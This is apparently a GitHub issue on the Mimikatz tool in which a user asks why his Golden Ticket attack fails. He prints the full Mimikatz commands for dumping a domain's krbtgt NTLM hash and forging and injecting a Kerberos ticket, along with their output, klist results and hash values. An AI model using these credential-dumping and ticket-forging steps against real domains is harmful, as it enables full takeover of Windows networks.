ISSUE: Losing tickets when attempting to use the Mimikatz golden module

[rick-engle]

I have been going through many of your wikis and various articles on Mimikatz and cannot understand why I can’t get the Golden Ticket attack to work. I am injecting a golden ticket into my session but as soon as I try an elevated privilege command like dir \servername\c$, running klist shows my that my ticket is no longer cached.

I am running Mimikatz on a non-domain joined Windows 10 PC that is on the same network as an unpatched Windows Server 2012 R2 Domain Controller.

I have the SID of my domain controller (sid:S-1-5-21…) the full domain name, and the hash for my krbtgt account. I got the NTLM HASH for the krbtgt account like this:

mimikatz # lsadump::lsa /inject /name:krbtgt Domain : MYDOMAIN / S-1-5-21-4053458607-1441617025- XXXXXXXXXX

RID : 000001f6 (502) User : krbtgt

• Primary NTLM : 09a4891da94d1f2522afdc7c4dd09b7b LM : Hash NTLM: 09a4891da94d1f2522afdc7c4dd09b7b ntlm- 0: 09a4891da94d1f2522afdc7c4dd09b7b lm - 0: 59968800dc52757ec5fe14f86b2103cd

Then I run this command in Mimikatz which is successful: kerberos::golden /user:baduser1 /domain:mydomain.com /sid:S-1-5-21-4053458607-1441617025-XXXXXXXXXX /krbtgt:09a4891da94d1f2522afdc7c4dd09b7b /ptt

mimikatz # kerberos::golden /user:baduser1 /domain:toondom2.com /sid:S-1-5-21-4053458607-1441617025-3390084498 /krbtgt:09a4891da94d1f2522afdc7c4dd09b7b /ptt

.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo)

/ \ ## /*** Benjamin DELPY gentilkiwi ( [email protected] )

\ / ## > https://blog.gentilkiwi.com/mimikatz

'## v ##' Vincent LE TOUX ( [email protected] ) '#####' > https://pingcastle.com/ / https://mysmartlogon.com/ ***/

User : baduser1 Domain : mydomain.com (MYDOMAIN) SID : S-1-5-21-4053458607-1441617025- XXXXXXXXXX User Id : 500 Groups Id : *513 512 520 518 519 ServiceKey: 09a4891da94d1f2522afdc7c4dd09b7b - rc4_hmac_nt Lifetime : 12/19/2022 5:59:20 PM ; 12/16/2032 5:59:20 PM ; 12/16/2032 5:59:20 PM -> Ticket : ** Pass The Ticket **

• PAC generated
• PAC signed
• EncTicketPart generated
• EncTicketPart encrypted
• KrbCred generated

Golden ticket for 'baduser1 @ mydomain.com' successfully submitted for current session

I then exit Mimikatz, and check my ticket with klist and I see my ticket: Current LogonId is 0:0xab242d

Cached Tickets: (1)

#0> Client: baduser1 @ toondom2.com Server: krbtgt/mydomain.com @ mydomain.com KerbTicket Encryption Type: RSADSI RC4-HMAC(NT) Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent Start Time: 12/19/2022 17:59:20 (local) End Time: 12/16/2032 17:59:20 (local) Renew Time: 12/16/2032 17:59:20 (local) Session Key Type: RSADSI RC4-HMAC(NT) Cache Flags: 0x1 -> PRIMARY Kdc Called:

But then as soon as I try to access my domain controller using something like this: C:\Attackfolder\x64>dir \DC1.mydomain.com\c$ The username or password is incorrect.

And then running klist again: Current LogonId is 0:0xab242d Cached Tickets: (0)

I have tried so many different options in Mimikatz and while all of the articles seem to make it look very simple, my ticket is always removed/revoked, and I don’t succeed in the attack.

Do you see what I’m doing wrong and have a suggestion?